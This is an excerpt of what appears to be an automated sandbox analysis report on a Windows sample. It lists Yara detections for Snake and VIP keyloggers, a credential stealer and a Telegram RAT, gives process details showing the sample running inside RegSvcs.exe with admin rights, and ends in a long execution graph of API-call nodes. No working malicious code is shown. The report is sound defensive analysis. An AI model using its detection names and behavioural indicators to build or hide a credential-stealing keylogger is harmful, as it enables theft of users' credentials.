                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2166172268.0000000001E90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.2166172268.0000000001E90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.2166172268.0000000001E90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2166172268.0000000001E90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2166172268.0000000001E90000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                  • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000000.00000002.2166172268.0000000001E90000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000000.00000002.2166172268.0000000001E90000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:2
                                                                                                                  Start time:14:37:40
                                                                                                                  Start date:10/01/2025
                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\Desktop\19d6P55zd1.exe"
                                                                                                                  Imagebase:0xd00000
                                                                                                                  File size:45'984 bytes
                                                                                                                  MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4603067666.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4601945370.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.4601945370.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.4601945370.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4601945370.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.4603067666.00000000032B5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.4603067666.00000000032B5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  Reputation:high
                                                                                                                  Has exited:false

                                                                                                                  Disassembly

                                                                                                                  Reset < >

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:3.8%
                                                                                                                    Dynamic/Decrypted Code Coverage:0.4%
                                                                                                                    Signature Coverage:8.9%
                                                                                                                    Total number of Nodes:2000
                                                                                                                    Total number of Limit Nodes:55
                                                                                                                    execution_graph 100950 323633 100951 32366a 100950->100951 100952 3236e5 100951->100952 100953 3236e7 100951->100953 100954 323688 100951->100954 100955 3236ca DefWindowProcW 100952->100955 100956 35d0cc 100953->100956 100957 3236ed 100953->100957 100958 323695 100954->100958 100959 32374b PostQuitMessage 100954->100959 100960 3236d8 100955->100960 101005 331070 10 API calls Mailbox 100956->101005 100961 3236f2 100957->100961 100962 323715 SetTimer RegisterWindowMessageW 100957->100962 100964 35d154 100958->100964 100965 3236a0 100958->100965 100959->100960 100966 35d06f 100961->100966 100967 3236f9 KillTimer 100961->100967 100962->100960 100969 32373e CreatePopupMenu 100962->100969 101021 382527 71 API calls _memset 100964->101021 100970 323755 100965->100970 100971 3236a8 100965->100971 100975 35d074 100966->100975 100976 35d0a8 MoveWindow 100966->100976 101002 32443a Shell_NotifyIconW _memset 100967->101002 100968 35d0f3 101006 331093 341 API calls Mailbox 100968->101006 100969->100960 100995 3244a0 100970->100995 100979 3236b3 100971->100979 100980 35d139 100971->100980 100973 35d166 100973->100955 100973->100960 100983 35d097 SetFocus 100975->100983 100984 35d078 100975->100984 100976->100960 100981 35d124 100979->100981 100982 3236be 100979->100982 100980->100955 101020 377c36 59 API calls Mailbox 100980->101020 101019 382d36 81 API calls _memset 100981->101019 100982->100955 101007 32443a Shell_NotifyIconW _memset 100982->101007 100983->100960 100984->100982 100986 35d081 100984->100986 100985 32370c 101003 323114 DeleteObject DestroyWindow Mailbox 100985->101003 101004 331070 10 API calls Mailbox 100986->101004 100991 35d134 100991->100960 100993 35d118 101008 32434a 100993->101008 100996 3244b7 _memset 100995->100996 100997 324539 100995->100997 101022 32407c 100996->101022 100997->100960 100999 324522 KillTimer SetTimer 100999->100997 101000 35d4ab Shell_NotifyIconW 101000->100999 101001 3244de 101001->100999 101001->101000 101002->100985 101003->100960 101004->100960 101005->100968 101006->100982 101007->100993 101009 324375 _memset 101008->101009 101141 324182 101009->101141 101012 3243fa 101014 324430 Shell_NotifyIconW 101012->101014 101015 324414 Shell_NotifyIconW 101012->101015 101016 324422 101014->101016 101015->101016 101017 32407c 61 API calls 101016->101017 101018 324429 101017->101018 101018->100952 101019->100991 101020->100952 101021->100973 101023 324098 101022->101023 101043 32416f Mailbox 101022->101043 101044 327a16 101023->101044 101026 3240b3 101049 327bcc 101026->101049 101027 35d3c8 LoadStringW 101029 35d3e2 101027->101029 101032 327b2e 59 API calls 101029->101032 101030 3240c8 101030->101029 101031 3240d9 101030->101031 101033 3240e3 101031->101033 101034 324174 101031->101034 101037 35d3ec 101032->101037 101058 327b2e 101033->101058 101067 328047 101034->101067 101039 3240ed _memset _wcscpy 101037->101039 101071 327cab 101037->101071 101041 324155 Shell_NotifyIconW 101039->101041 101040 35d40e 101042 327cab 59 API calls 101040->101042 101041->101043 101042->101039 101043->101001 101078 340db6 101044->101078 101046 327a3b 101088 328029 101046->101088 101050 327c45 101049->101050 101051 327bd8 __wsetenvp 101049->101051 101120 327d2c 101050->101120 101053 327c13 101051->101053 101054 327bee 101051->101054 101055 328029 59 API calls 101053->101055 101119 327f27 59 API calls Mailbox 101054->101119 101057 327bf6 _memmove 101055->101057 101057->101030 101059 327b40 101058->101059 101060 35ec6b 101058->101060 101128 327a51 101059->101128 101134 377bdb 59 API calls _memmove 101060->101134 101063 327b4c 101063->101039 101064 35ec75 101065 328047 59 API calls 101064->101065 101066 35ec7d Mailbox 101065->101066 101068 328052 101067->101068 101069 32805a 101067->101069 101135 327f77 59 API calls 2 library calls 101068->101135 101069->101039 101072 327cbf 101071->101072 101073 35ed4a 101071->101073 101136 327c50 101072->101136 101075 328029 59 API calls 101073->101075 101077 35ed55 __wsetenvp _memmove 101075->101077 101076 327cca 101076->101040 101080 340dbe 101078->101080 101081 340dd8 101080->101081 101083 340ddc std::exception::exception 101080->101083 101091 34571c 101080->101091 101108 3433a1 DecodePointer 101080->101108 101081->101046 101109 34859b RaiseException 101083->101109 101085 340e06 101110 3484d1 58 API calls _free 101085->101110 101087 340e18 101087->101046 101089 340db6 Mailbox 59 API calls 101088->101089 101090 3240a6 101089->101090 101090->101026 101090->101027 101092 345797 101091->101092 101104 345728 101091->101104 101117 3433a1 DecodePointer 101092->101117 101094 34579d 101118 348b28 58 API calls __getptd_noexit 101094->101118 101097 34575b RtlAllocateHeap 101097->101104 101107 34578f 101097->101107 101099 345783 101115 348b28 58 API calls __getptd_noexit 101099->101115 101103 345733 101103->101104 101111 34a16b 58 API calls 2 library calls 101103->101111 101112 34a1c8 58 API calls 8 library calls 101103->101112 101113 34309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 101103->101113 101104->101097 101104->101099 101104->101103 101105 345781 101104->101105 101114 3433a1 DecodePointer 101104->101114 101116 348b28 58 API calls __getptd_noexit 101105->101116 101107->101080 101108->101080 101109->101085 101110->101087 101111->101103 101112->101103 101114->101104 101115->101105 101116->101107 101117->101094 101118->101107 101119->101057 101121 327d3a 101120->101121 101123 327d43 _memmove 101120->101123 101121->101123 101124 327e4f 101121->101124 101123->101057 101125 327e62 101124->101125 101127 327e5f _memmove 101124->101127 101126 340db6 Mailbox 59 API calls 101125->101126 101126->101127 101127->101123 101129 327a5f 101128->101129 101133 327a85 _memmove 101128->101133 101130 340db6 Mailbox 59 API calls 101129->101130 101129->101133 101131 327ad4 101130->101131 101132 340db6 Mailbox 59 API calls 101131->101132 101132->101133 101133->101063 101134->101064 101135->101069 101137 327c5f __wsetenvp 101136->101137 101138 328029 59 API calls 101137->101138 101139 327c70 _memmove 101137->101139 101140 35ed07 _memmove 101138->101140 101139->101076 101142 324196 101141->101142 101143 35d423 101141->101143 101142->101012 101145 382f94 62 API calls _W_store_winword 101142->101145 101143->101142 101144 35d42c DestroyIcon 101143->101144 101144->101142 101145->101012 101146 35fe27 101159 33f944 101146->101159 101148 35fe3d 101149 35fe53 101148->101149 101150 35febe 101148->101150 101248 329e5d 60 API calls 101149->101248 101168 32fce0 101150->101168 101152 35fe92 101153 36089c 101152->101153 101154 35fe9a 101152->101154 101250 389e4a 89 API calls 4 library calls 101153->101250 101249 38834f 59 API calls Mailbox 101154->101249 101158 35feb2 Mailbox 101160 33f962 101159->101160 101161 33f950 101159->101161 101163 33f991 101160->101163 101164 33f968 101160->101164 101251 329d3c 101161->101251 101165 329d3c 60 API calls 101163->101165 101166 340db6 Mailbox 59 API calls 101164->101166 101167 33f95a 101165->101167 101166->101167 101167->101148 101266 328180 101168->101266 101170 32fd3d 101171 36472d 101170->101171 101231 3306f6 101170->101231 101271 32f234 101170->101271 101402 389e4a 89 API calls 4 library calls 101171->101402 101175 32fe3e 101180 32fe4c 101175->101180 101207 36488d 101175->101207 101406 3766ec 59 API calls 2 library calls 101175->101406 101176 330517 101185 340db6 Mailbox 59 API calls 101176->101185 101177 32fdd3 101177->101175 101177->101176 101181 364755 101177->101181 101186 364742 101177->101186 101201 340db6 59 API calls Mailbox 101177->101201 101222 36480c 101177->101222 101225 330545 _memmove 101177->101225 101372 329ea0 101177->101372 101178 364b53 101178->101186 101427 389e4a 89 API calls 4 library calls 101178->101427 101180->101178 101191 3648f9 101180->101191 101275 32837c 101180->101275 101199 3647d7 101181->101199 101403 32f6a3 341 API calls 101181->101403 101185->101225 101188 364848 101407 3760ef 59 API calls 2 library calls 101188->101407 101193 364917 101191->101193 101410 3285c0 101191->101410 101197 364928 101193->101197 101204 3285c0 59 API calls 101193->101204 101194 32fea4 101205 364ad6 101194->101205 101206 32ff32 101194->101206 101240 330179 Mailbox _memmove 101194->101240 101195 36486b 101200 329ea0 341 API calls 101195->101200 101197->101240 101418 3760ab 59 API calls Mailbox 101197->101418 101198 3648b2 Mailbox 101198->101180 101409 3766ec 59 API calls 2 library calls 101198->101409 101199->101186 101404 389e4a 89 API calls 4 library calls 101199->101404 101200->101207 101201->101177 101202 340db6 Mailbox 59 API calls 101246 330106 _memmove 101202->101246 101204->101197 101426 389ae7 60 API calls 101205->101426 101208 340db6 Mailbox 59 API calls 101206->101208 101207->101180 101207->101186 101408 39a2d9 85 API calls Mailbox 101207->101408 101212 32ff39 101208->101212 101212->101231 101282 3309d0 101212->101282 101213 364a4d 101214 329ea0 341 API calls 101213->101214 101215 364a87 101214->101215 101215->101186 101421 3284c0 101215->101421 101217 32ffb2 101217->101225 101226 32ffe6 101217->101226 101217->101231 101405 389e4a 89 API calls 4 library calls 101222->101405 101224 364ab2 101425 389e4a 89 API calls 4 library calls 101224->101425 101225->101202 101230 328047 59 API calls 101226->101230 101233 330007 101226->101233 101229 329d3c 60 API calls 101229->101240 101230->101233 101401 389e4a 89 API calls 4 library calls 101231->101401 101232 330398 101232->101158 101233->101231 101235 364b24 101233->101235 101237 33004c 101233->101237 101234 340db6 59 API calls Mailbox 101234->101240 101236 329d3c 60 API calls 101235->101236 101236->101178 101237->101178 101237->101231 101238 3300d8 101237->101238 101239 329d3c 60 API calls 101238->101239 101242 3300eb 101239->101242 101240->101213 101240->101224 101240->101229 101240->101231 101240->101232 101240->101234 101241 364a1c 101240->101241 101370 328740 68 API calls __cinit 101240->101370 101371 328660 68 API calls 101240->101371 101419 385937 68 API calls 101240->101419 101420 3289b3 69 API calls Mailbox 101240->101420 101244 340db6 Mailbox 59 API calls 101241->101244 101242->101231 101359 3282df 101242->101359 101244->101213 101246->101240 101247 330162 101246->101247 101396 329c90 101246->101396 101247->101158 101248->101152 101249->101158 101250->101158 101252 329d4a 101251->101252 101262 329d78 Mailbox 101251->101262 101253 329d9d 101252->101253 101256 329d50 Mailbox 101252->101256 101254 328047 59 API calls 101253->101254 101254->101262 101255 329d64 101257 329d6f 101255->101257 101258 329dcc 101255->101258 101255->101262 101256->101255 101259 35fa0f 101256->101259 101260 35f9e6 VariantClear 101257->101260 101257->101262 101258->101262 101264 328cd4 59 API calls Mailbox 101258->101264 101259->101262 101265 376e8f 59 API calls 101259->101265 101260->101262 101262->101167 101264->101262 101265->101262 101267 32818f 101266->101267 101270 3281aa 101266->101270 101268 327e4f 59 API calls 101267->101268 101269 328197 CharUpperBuffW 101268->101269 101269->101270 101270->101170 101272 32f251 101271->101272 101273 32f272 101272->101273 101428 389e4a 89 API calls 4 library calls 101272->101428 101273->101177 101276 35edbd 101275->101276 101277 32838d 101275->101277 101278 340db6 Mailbox 59 API calls 101277->101278 101279 328394 101278->101279 101280 3283b5 101279->101280 101429 328634 59 API calls Mailbox 101279->101429 101280->101191 101280->101194 101283 364cc3 101282->101283 101297 3309f5 101282->101297 101490 389e4a 89 API calls 4 library calls 101283->101490 101285 330cfa 101285->101217 101287 330ee4 101287->101285 101289 330ef1 101287->101289 101488 331093 341 API calls Mailbox 101289->101488 101290 330a4b PeekMessageW 101358 330a05 Mailbox 101290->101358 101292 330ef8 LockWindowUpdate DestroyWindow GetMessageW 101292->101285 101295 330f2a 101292->101295 101294 364e81 Sleep 101294->101358 101299 365c58 TranslateMessage DispatchMessageW GetMessageW 101295->101299 101296 330ce4 101296->101285 101487 331070 10 API calls Mailbox 101296->101487 101297->101358 101491 329e5d 60 API calls 101297->101491 101492 376349 341 API calls 101297->101492 101299->101299 101300 365c88 101299->101300 101300->101285 101301 330e43 PeekMessageW 101301->101358 101302 330ea5 TranslateMessage DispatchMessageW 101302->101301 101303 364d50 TranslateAcceleratorW 101303->101301 101303->101358 101304 340db6 59 API calls Mailbox 101304->101358 101305 330d13 timeGetTime 101305->101358 101306 36581f WaitForSingleObject 101308 36583c GetExitCodeProcess CloseHandle 101306->101308 101306->101358 101342 330f95 101308->101342 101309 330e5f Sleep 101344 330e70 Mailbox 101309->101344 101310 328047 59 API calls 101310->101358 101313 365af8 Sleep 101313->101344 101315 32b73c 314 API calls 101315->101358 101316 34049f timeGetTime 101316->101344 101317 330f4e timeGetTime 101489 329e5d 60 API calls 101317->101489 101320 365b8f GetExitCodeProcess 101322 365ba5 WaitForSingleObject 101320->101322 101323 365bbb CloseHandle 101320->101323 101322->101323 101322->101358 101323->101344 101326 3a5f25 110 API calls 101326->101344 101327 32b7dd 109 API calls 101327->101344 101328 329e5d 60 API calls 101328->101358 101329 365874 101329->101342 101330 365c17 Sleep 101330->101358 101331 365078 Sleep 101331->101358 101338 329ea0 314 API calls 101338->101358 101340 32fce0 314 API calls 101340->101358 101342->101217 101344->101316 101344->101320 101344->101326 101344->101327 101344->101329 101344->101330 101344->101331 101344->101342 101344->101358 101516 327667 101344->101516 101521 382408 60 API calls 101344->101521 101522 329e5d 60 API calls 101344->101522 101523 327de1 101344->101523 101527 3289b3 69 API calls Mailbox 101344->101527 101528 32b73c 341 API calls 101344->101528 101529 3764da 60 API calls 101344->101529 101530 385244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 101344->101530 101531 383c55 66 API calls Mailbox 101344->101531 101345 389e4a 89 API calls 101345->101358 101347 329c90 59 API calls Mailbox 101347->101358 101348 3284c0 69 API calls 101348->101358 101349 3282df 59 API calls 101349->101358 101350 37617e 59 API calls Mailbox 101350->101358 101351 3655d5 VariantClear 101351->101358 101352 36566b VariantClear 101352->101358 101353 328cd4 59 API calls Mailbox 101353->101358 101354 365419 VariantClear 101354->101358 101355 376e8f 59 API calls 101355->101358 101356 327de1 59 API calls 101356->101358 101357 3289b3 69 API calls 101357->101358 101358->101290 101358->101294 101358->101296 101358->101301 101358->101302 101358->101303 101358->101304 101358->101305 101358->101306 101358->101309 101358->101310 101358->101313 101358->101315 101358->101317 101358->101328 101358->101338 101358->101340 101358->101342 101358->101344 101358->101345 101358->101347 101358->101348 101358->101349 101358->101350 101358->101351 101358->101352 101358->101353 101358->101354 101358->101355 101358->101356 101358->101357 101430 32e6a0 101358->101430 101461 32f460 101358->101461 101481 3231ce 101358->101481 101486 32e420 341 API calls 101358->101486 101493 3a6018 59 API calls 101358->101493 101494 389a15 59 API calls Mailbox 101358->101494 101495 37d4f2 59 API calls 101358->101495 101496 329837 101358->101496 101514 3760ef 59 API calls 2 library calls 101358->101514 101515 328401 59 API calls 101358->101515 101360 35eda1 101359->101360 101363 3282f2 101359->101363 101361 35edb1 101360->101361 102791 3761a4 59 API calls 101360->102791 101364 32831c 101363->101364 101366 3285c0 59 API calls 101363->101366 101369 328339 Mailbox 101363->101369 101365 328322 101364->101365 101367 3285c0 59 API calls 101364->101367 101368 329c90 Mailbox 59 API calls 101365->101368 101365->101369 101366->101364 101367->101365 101368->101369 101369->101246 101370->101240 101371->101240 101373 329ebf 101372->101373 101388 329eed Mailbox 101372->101388 101374 340db6 Mailbox 59 API calls 101373->101374 101374->101388 101375 32b475 101376 328047 59 API calls 101375->101376 101391 32a057 101376->101391 101377 32b47a 101378 360055 101377->101378 101395 3609e5 101377->101395 102794 389e4a 89 API calls 4 library calls 101378->102794 101379 327667 59 API calls 101379->101388 101383 360064 101383->101177 101384 340db6 59 API calls Mailbox 101384->101388 101386 328047 59 API calls 101386->101388 101388->101375 101388->101377 101388->101378 101388->101379 101388->101384 101388->101386 101389 342d40 67 API calls __cinit 101388->101389 101390 376e8f 59 API calls 101388->101390 101388->101391 101392 3609d6 101388->101392 101393 32a55a 101388->101393 102792 32c8c0 341 API calls 2 library calls 101388->102792 102793 32b900 60 API calls Mailbox 101388->102793 101389->101388 101390->101388 101391->101177 102796 389e4a 89 API calls 4 library calls 101392->102796 102795 389e4a 89 API calls 4 library calls 101393->102795 102797 389e4a 89 API calls 4 library calls 101395->102797 101398 329c9b 101396->101398 101397 329cd2 101397->101246 101398->101397 102798 328cd4 59 API calls Mailbox 101398->102798 101400 329cfd 101400->101246 101401->101171 101402->101186 101403->101199 101404->101186 101405->101186 101406->101188 101407->101195 101408->101198 101409->101198 101411 3285ce 101410->101411 101417 3285f6 101410->101417 101412 3285dc 101411->101412 101413 3285c0 59 API calls 101411->101413 101414 3285e2 101412->101414 101415 3285c0 59 API calls 101412->101415 101413->101412 101416 329c90 Mailbox 59 API calls 101414->101416 101414->101417 101415->101414 101416->101417 101417->101193 101418->101240 101419->101240 101420->101240 101422 3284cb 101421->101422 101424 3284f2 101422->101424 102799 3289b3 69 API calls Mailbox 101422->102799 101424->101224 101425->101186 101426->101226 101427->101186 101428->101273 101429->101280 101431 32e6d5 101430->101431 101432 363aa9 101431->101432 101435 32e73f 101431->101435 101444 32e799 101431->101444 101433 329ea0 341 API calls 101432->101433 101434 363abe 101433->101434 101460 32e970 Mailbox 101434->101460 101533 389e4a 89 API calls 4 library calls 101434->101533 101438 327667 59 API calls 101435->101438 101435->101444 101436 327667 59 API calls 101436->101444 101439 363b04 101438->101439 101534 342d40 101439->101534 101440 342d40 __cinit 67 API calls 101440->101444 101441 363b26 101441->101358 101443 3284c0 69 API calls 101443->101460 101444->101436 101444->101440 101444->101441 101445 32e95a 101444->101445 101444->101460 101445->101460 101537 389e4a 89 API calls 4 library calls 101445->101537 101447 329ea0 341 API calls 101447->101460 101448 328d40 59 API calls 101448->101460 101449 329c90 Mailbox 59 API calls 101449->101460 101450 389e4a 89 API calls 101450->101460 101453 32f195 101541 389e4a 89 API calls 4 library calls 101453->101541 101458 363e25 101458->101358 101459 32ea78 101459->101358 101460->101443 101460->101447 101460->101448 101460->101449 101460->101450 101460->101453 101460->101459 101532 327f77 59 API calls 2 library calls 101460->101532 101538 376e8f 59 API calls 101460->101538 101539 39c5c3 341 API calls 101460->101539 101540 39b53c 341 API calls Mailbox 101460->101540 101542 3993c6 341 API calls Mailbox 101460->101542 101462 32f650 101461->101462 101463 32f4ba 101461->101463 101464 327de1 59 API calls 101462->101464 101465 32f4c6 101463->101465 101466 36441e 101463->101466 101472 32f58c Mailbox 101464->101472 101722 32f290 341 API calls 2 library calls 101465->101722 101723 39bc6b 341 API calls Mailbox 101466->101723 101469 36442c 101473 32f630 101469->101473 101724 389e4a 89 API calls 4 library calls 101469->101724 101471 32f4fd 101471->101469 101471->101472 101471->101473 101621 39445a 101472->101621 101630 39df37 101472->101630 101633 324e4a 101472->101633 101639 38cb7a 101472->101639 101719 383c37 101472->101719 101473->101358 101474 32f5e3 101474->101473 101475 329c90 Mailbox 59 API calls 101474->101475 101475->101474 101482 323212 101481->101482 101485 3231e0 101481->101485 101482->101358 101483 323205 IsDialogMessageW 101483->101482 101483->101485 101484 35cf32 GetClassLongW 101484->101483 101484->101485 101485->101482 101485->101483 101485->101484 101486->101358 101487->101287 101488->101292 101489->101358 101490->101297 101491->101297 101492->101297 101493->101358 101494->101358 101495->101358 101497 329851 101496->101497 101506 32984b 101496->101506 101498 35f5d3 __i64tow 101497->101498 101499 329899 101497->101499 101500 35f4da 101497->101500 101501 329857 __itow 101497->101501 102789 343698 83 API calls 3 library calls 101499->102789 101507 340db6 Mailbox 59 API calls 101500->101507 101512 35f552 Mailbox _wcscpy 101500->101512 101504 340db6 Mailbox 59 API calls 101501->101504 101505 329871 101504->101505 101505->101506 101508 327de1 59 API calls 101505->101508 101506->101358 101509 35f51f 101507->101509 101508->101506 101510 340db6 Mailbox 59 API calls 101509->101510 101511 35f545 101510->101511 101511->101512 101513 327de1 59 API calls 101511->101513 102790 343698 83 API calls 3 library calls 101512->102790 101513->101512 101514->101358 101515->101358 101517 340db6 Mailbox 59 API calls 101516->101517 101518 327688 101517->101518 101519 340db6 Mailbox 59 API calls 101518->101519 101520 327696 101519->101520 101520->101344 101521->101344 101522->101344 101524 327df0 __wsetenvp _memmove 101523->101524 101525 340db6 Mailbox 59 API calls 101524->101525 101526 327e2e 101525->101526 101526->101344 101527->101344 101528->101344 101529->101344 101530->101344 101531->101344 101532->101460 101533->101460 101543 342c44 101534->101543 101536 342d4b 101536->101444 101537->101460 101538->101460 101539->101460 101540->101460 101541->101458 101542->101460 101544 342c50 __write 101543->101544 101551 343217 101544->101551 101550 342c77 __write 101550->101536 101568 349c0b 101551->101568 101553 342c59 101554 342c88 DecodePointer DecodePointer 101553->101554 101555 342cb5 101554->101555 101556 342c65 101554->101556 101555->101556 101614 3487a4 59 API calls __write 101555->101614 101565 342c82 101556->101565 101558 342d18 EncodePointer EncodePointer 101558->101556 101559 342cc7 101559->101558 101560 342cec 101559->101560 101615 348864 61 API calls 2 library calls 101559->101615 101560->101556 101564 342d06 EncodePointer 101560->101564 101616 348864 61 API calls 2 library calls 101560->101616 101563 342d00 101563->101556 101563->101564 101564->101558 101617 343220 101565->101617 101569 349c1c 101568->101569 101570 349c2f EnterCriticalSection 101568->101570 101575 349c93 101569->101575 101570->101553 101572 349c22 101572->101570 101599 3430b5 58 API calls 3 library calls 101572->101599 101576 349c9f __write 101575->101576 101577 349cc0 101576->101577 101578 349ca8 101576->101578 101586 349ce1 __write 101577->101586 101603 34881d 58 API calls __malloc_crt 101577->101603 101600 34a16b 58 API calls 2 library calls 101578->101600 101581 349cad 101601 34a1c8 58 API calls 8 library calls 101581->101601 101582 349cd5 101584 349cdc 101582->101584 101585 349ceb 101582->101585 101604 348b28 58 API calls __getptd_noexit 101584->101604 101589 349c0b __lock 58 API calls 101585->101589 101586->101572 101587 349cb4 101602 34309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 101587->101602 101591 349cf2 101589->101591 101593 349d17 101591->101593 101594 349cff 101591->101594 101606 342d55 101593->101606 101605 349e2b InitializeCriticalSectionAndSpinCount 101594->101605 101597 349d0b 101612 349d33 LeaveCriticalSection _doexit 101597->101612 101600->101581 101601->101587 101603->101582 101604->101586 101605->101597 101607 342d5e RtlFreeHeap 101606->101607 101608 342d87 __dosmaperr 101606->101608 101607->101608 101609 342d73 101607->101609 101608->101597 101613 348b28 58 API calls __getptd_noexit 101609->101613 101611 342d79 GetLastError 101611->101608 101612->101586 101613->101611 101614->101559 101615->101560 101616->101563 101620 349d75 LeaveCriticalSection 101617->101620 101619 342c87 101619->101550 101620->101619 101622 329837 84 API calls 101621->101622 101623 394494 101622->101623 101725 326240 101623->101725 101625 3944a4 101626 329ea0 341 API calls 101625->101626 101628 3944c9 101625->101628 101626->101628 101629 3944cd 101628->101629 101750 329a98 59 API calls Mailbox 101628->101750 101629->101474 101759 39cadd 101630->101759 101632 39df47 101632->101474 101634 324e54 101633->101634 101636 324e5b 101633->101636 101884 3453a6 101634->101884 101637 324e6a 101636->101637 101638 324e7b FreeLibrary 101636->101638 101637->101474 101638->101637 101640 327667 59 API calls 101639->101640 101641 38cbaf 101640->101641 101642 327667 59 API calls 101641->101642 101643 38cbb8 101642->101643 101644 38cbcc 101643->101644 102341 329b3c 59 API calls 101643->102341 101646 329837 84 API calls 101644->101646 101647 38cbe9 101646->101647 101648 38ccea 101647->101648 101649 38cc0b 101647->101649 101661 38cd1a Mailbox 101647->101661 102154 324ddd 101648->102154 101650 329837 84 API calls 101649->101650 101652 38cc17 101650->101652 101654 328047 59 API calls 101652->101654 101656 38cc23 101654->101656 101655 38cd16 101658 327667 59 API calls 101655->101658 101655->101661 101663 38cc69 101656->101663 101664 38cc37 101656->101664 101657 324ddd 136 API calls 101657->101655 101659 38cd4b 101658->101659 101660 327667 59 API calls 101659->101660 101662 38cd54 101660->101662 101661->101474 101666 327667 59 API calls 101662->101666 101665 329837 84 API calls 101663->101665 101667 328047 59 API calls 101664->101667 101668 38cc76 101665->101668 101669 38cd5d 101666->101669 101670 38cc47 101667->101670 101671 328047 59 API calls 101668->101671 101672 327667 59 API calls 101669->101672 101673 327cab 59 API calls 101670->101673 101674 38cc82 101671->101674 101675 38cd66 101672->101675 101676 38cc51 101673->101676 102342 384a31 GetFileAttributesW 101674->102342 101678 329837 84 API calls 101675->101678 101679 329837 84 API calls 101676->101679 101681 38cd73 101678->101681 101682 38cc5d 101679->101682 101680 38cc8b 101683 38cc9e 101680->101683 101686 3279f2 59 API calls 101680->101686 102178 32459b 101681->102178 101685 327b2e 59 API calls 101682->101685 101688 329837 84 API calls 101683->101688 101693 38cca4 101683->101693 101685->101663 101686->101683 101687 38cd8e 102229 3279f2 101687->102229 101690 38cccb 101688->101690 102343 3837ef 75 API calls Mailbox 101690->102343 101693->101661 101694 38cdd1 101695 328047 59 API calls 101694->101695 101697 38cddf 101695->101697 101696 3279f2 59 API calls 101698 38cdae 101696->101698 101699 327b2e 59 API calls 101697->101699 101698->101694 101700 327bcc 59 API calls 101698->101700 101701 38cded 101699->101701 101702 38cdc3 101700->101702 101703 327b2e 59 API calls 101701->101703 101704 327bcc 59 API calls 101702->101704 101705 38cdfb 101703->101705 101704->101694 101706 327b2e 59 API calls 101705->101706 101707 38ce09 101706->101707 101708 329837 84 API calls 101707->101708 101709 38ce15 101708->101709 102232 384071 101709->102232 101711 38ce26 101712 383c37 3 API calls 101711->101712 101713 38ce30 101712->101713 101714 329837 84 API calls 101713->101714 101718 38ce61 101713->101718 101715 38ce4e 101714->101715 102286 389155 101715->102286 101717 324e4a 84 API calls 101717->101661 101718->101717 102785 38445a GetFileAttributesW 101719->102785 101722->101471 101723->101469 101724->101473 101726 327a16 59 API calls 101725->101726 101744 326265 101726->101744 101727 32646a 101753 32750f 59 API calls 2 library calls 101727->101753 101729 326484 Mailbox 101729->101625 101732 35dff6 101756 37f8aa 91 API calls 4 library calls 101732->101756 101733 327d8c 59 API calls 101733->101744 101734 32750f 59 API calls 101734->101744 101738 35e004 101757 32750f 59 API calls 2 library calls 101738->101757 101740 35e01a 101740->101729 101741 326799 _memmove 101758 37f8aa 91 API calls 4 library calls 101741->101758 101742 35df92 101743 328029 59 API calls 101742->101743 101745 35df9d 101743->101745 101744->101727 101744->101732 101744->101733 101744->101734 101744->101741 101744->101742 101747 327e4f 59 API calls 101744->101747 101751 325f6c 60 API calls 101744->101751 101752 325d41 59 API calls Mailbox 101744->101752 101754 325e72 60 API calls 101744->101754 101755 327924 59 API calls 2 library calls 101744->101755 101749 340db6 Mailbox 59 API calls 101745->101749 101748 32643b CharUpperBuffW 101747->101748 101748->101744 101749->101741 101750->101629 